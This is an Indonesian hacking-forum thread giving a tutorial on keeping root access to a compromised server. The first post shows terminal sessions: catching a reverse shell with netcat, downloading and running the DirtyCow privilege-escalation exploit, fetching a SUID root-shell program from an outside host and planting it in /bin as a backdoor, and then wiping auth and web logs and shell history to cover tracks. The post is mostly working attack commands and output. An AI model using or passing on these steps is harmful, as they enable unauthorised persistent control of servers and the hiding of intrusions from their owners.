Mempertahankan akses root dengan suid program (rootkit)

by koboi 27-12-2016 - 10:44:23
#1
Hallo guys, kali ini saya akan membahas cara mempertahankan akses root server yang sudah kita rooting sebelumnya. Dalam thread kali ini saya tidak akan ngomong panjang lebar, tapi akan memberikan penjelasan singkat. ilustrasi di bawah adalah server yang sudah saya backconnect dan di rooting servernya terlebih dahulu.


Quote:root@backbox:~# nc -lvp 123
listening on [any] 123 ...
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55116
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ curl https://www.exploit-db.com/download/40616 -o dirtycow.c
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4965  100  4965    0     0   3161      0  0:00:01  0:00:01 --:--:--  3160
$ gcc dirtycow.c -o dirtycow -pthread
$ ./dirtycow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 57048
Racing, this may take a while..
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
id
uid=0(root) gid=33(www-data) groups=33(www-data)
python -c "import pty; pty.spawn('/bin/bash')"
root@victimserver:/var/www/html# curl http://backboxindonesia.org/suid.c suid.c
--2016-12-27 02:09:43--  http://backboxindonesia.org/suid.c
Resolving backboxindonesia.org (backboxindonesia.org)... 195.110.58.228
Connecting to backboxindonesia.org (backboxindonesia.org)|195.110.58.228|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 184 [text/x-csrc]
Saving to: ‘suid.c’

suid.c              100%[===================>]     184  --.-KB/s    in 0s      

2016-12-27 02:09:44 (3.75 MB/s) - ‘suid.c’ saved [184/184]

root@victimserver:/var/www/html# cat suid.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main() {
    if (setuid(0)) {
        perror("setuid");
        return 1;
    }
    system("/bin/bash");
    return 0;
}
root@victimserver:/var/www/html# gcc suid.c -o rksh
root@victimserver:/var/www/html# chmod +s rksh
root@victimserver:/var/www/html# mv rksh /bin/rksh

Di atas adalah ilustrasi server yang sudah kita rooting dan di sisipkan suid program di folder /bin/
Untuk mengeksekusi suid yang sudah kita buat tadi kita bisa langsung meng eksekusinya di user biasa dengan ilustrasi seperti ini.

Quote:root@backbox:~# nc -lvp 123
listening on [any] 123 ...
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55216
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ rksh
python -c "import pty; pty.spawn('/bin/bash')"
root@victimserver:/var/www/html# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
root@victimserver:/var/www/html#

Setelah kita melakukan aktivitas tersebut, alangkah baiknya kita menghapus log yang telah kita tinggalkan. Cukup hapus log yang perlu saja jangan terlalu rusuh ngehapus semua lognya. Think smart bro :v

Quote:root@victimserver:/var/www/html# echo "" > /var/log/auth.log
root@victimserver:/var/www/html# echo "" > /var/log/apache2/access.log
root@victimserver:/var/www/html# history -c

Mungkin cukup sekian tutorial singkat dari saya.
Thanks for reading :

#2
Alangkah keren nya kalo ada skrinsut om Big Grin bagus lagi kalo ada pideoh
Nice
{There's no God in My Code}






Users browsing this thread: 1 Guest(s)

Color Skins

Change Color:

Background Patterns:

Background Images:

Background Header:

Setting Panel

Main Options: